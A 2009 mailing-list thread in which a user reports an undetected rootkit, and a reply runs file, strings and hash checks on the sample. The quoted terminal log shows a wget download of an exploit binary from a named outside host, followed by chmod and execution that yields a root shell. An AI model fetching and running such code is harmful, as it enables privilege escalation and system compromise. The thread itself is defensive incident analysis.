Re: rootkit not found by rkhunter
On Sun, 4 Oct 2009 10:15:35 -0400
Thomas Krichel <krichel@openlib.org> wrote:
> I am running debian testing, 2.6.30 kernel.
>
> I have a rootkit installed on a bunch of machines that rkhunter
> does not find. This appears after infection with SHV4 / SHV5,
> which rkhunter found.
>
> Here it works to allow a non-root user to become root
>
> krichel@fricka:~$ mkdir a
> krichel@fricka:~$ cd a
> krichel@fricka:~/a$ ls -l
> total 0
> krichel@fricka:~/a$ wget webmail.facill.com.br/a
> --2009-10-04 07:47:42-- http://webmail.facill.com.br/a
> Resolving webmail.facill.com.br... 201.65.241.194
> Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 6886 (6.7K) [text/plain]
> Saving to: `a'
>
> 100%[======================================>] 6,886 6.88K/s
> in 1.0s
>
> 2009-10-04 07:47:44 (6.88 KB/s) - `a' saved [6886/6886]
>
> krichel@fricka:~/a$ chmod 777 a
> krichel@fricka:~/a$ ./a
> root@fricka:~/a#
>
> Here is a situation where it does not work
>
> krichel@chichek:~$ mkdir a
> krichel@chichek:~$ cd a
> krichel@chichek:~/a$ wget webmail.facill.com.br/a
> --2009-10-04 07:31:15-- http://webmail.facill.com.br/a
> Resolving webmail.facill.com.br... 201.65.241.194
> Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 6886 (6.7K) [text/plain]
> Saving to: `a'
>
> 100%[======================================>] 6,886 37.8K/s
> in 0.2s
>
> 2009-10-04 07:31:16 (37.8 KB/s) - `a' saved [6886/6886]
>
> krichel@chichek:~/a$ chmod 777 a
> krichel@chichek:~/a$ ./a
> mmap: Permission denied
>
>
> Does anybody here know how to delete this kit?
>
>
> Cheers,
>
> Thomas Krichel http://openlib.org/home/krichel
> RePEc:per:1965-06-05:thomas_krichel
> skype: thomaskrichel
This file should at least be deleted from the host.
fgeek@foo:~$ file a
a: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV),
dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not
stripped
fgeek@foo:~$ strings a
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
_IO_stdin_used
socket
exit
execl
ftruncate
perror
sendfile
unlink
mkstemp
mmap
getpagesize
getgid
getuid
__libc_start_main
GLIBC_2.1
GLIBC_2.0
PTRh
([^_]
[^_]
mmap
socket
mkstemp
unlink
ftruncate
/bin/sh
/tmp/tmp.XXXXXX
fgeek@foo:~$ md5sum a
b950af01be61a8cbf5d479430738bd18 a
fgeek@foo:~$ sha1sum a
639536caea56554406106ad8679115971485f3a2 a
Reply to: